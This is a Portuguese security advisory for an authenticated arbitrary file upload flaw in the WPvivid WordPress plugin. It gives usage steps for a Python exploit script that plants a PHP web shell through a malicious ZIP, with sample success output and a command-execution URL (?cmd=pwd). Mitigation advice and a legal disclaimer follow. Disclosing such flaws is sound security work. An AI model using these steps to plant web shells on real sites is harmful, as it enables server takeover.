
Publicado: 2024-10-16 | Migração, Backup, Staging – WPvivid <= 0.9.35 - Autenticado (Subscriber+) Upload Arbitrário de Arquivo
O plugin WPvivid do WordPress, projetado para migração e backups de sites, é vulnerável a uma falha de upload arbitrário de arquivos. Essa vulnerabilidade permite que usuários autenticados com privilégios de baixo nível façam upload e extraiam arquivos ZIP, potencialmente levando à execução remota de código (RCE) se um script malicioso for implantado entre os arquivos extraídos.
Um script de exploit em Python foi criado para aproveitar essa vulnerabilidade usando a seguinte metodologia:
Se a exploração for bem-sucedida, o script exibirá:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
Certifique-se de que um arquivo shell.zip malicioso exista no mesmo diretório do script de exploit.
O arquivo shell.zip deve conter um web shell PHP (e.g., nxploit.php).
É necessária uma conta WordPress válida com privilégios de Assinante ou superiores.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
O script verificará a versão do alvo e fará login usando as credenciais fornecidas.
Se o alvo for vulnerável, o script enviará o shell.zip e o extrairá.
Se for bem-sucedido, o script fornecerá uma URL para o shell enviado.
Depois que o shell for enviado e extraído com sucesso, você poderá interagir com ele enviando comandos por meio de uma URL:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
Para mitigar essa vulnerabilidade, é fortemente recomendado:
wp-content/uploads usando .htaccess ou configurações do servidor.Essa vulnerabilidade apresenta um risco sério, pois permite que atacantes autenticados façam upload e executem arquivos maliciosos em um servidor WordPress. Os administradores de sites devem tomar medidas imediatas para proteger suas instalações.
Aviso Legal: Este documento destina-se exclusivamente à pesquisa ética de segurança e a fins educacionais. Explorar vulnerabilidades sem permissão é ilegal e punível pelas leis aplicáveis. ( Nxploit | Khaled_alenazi )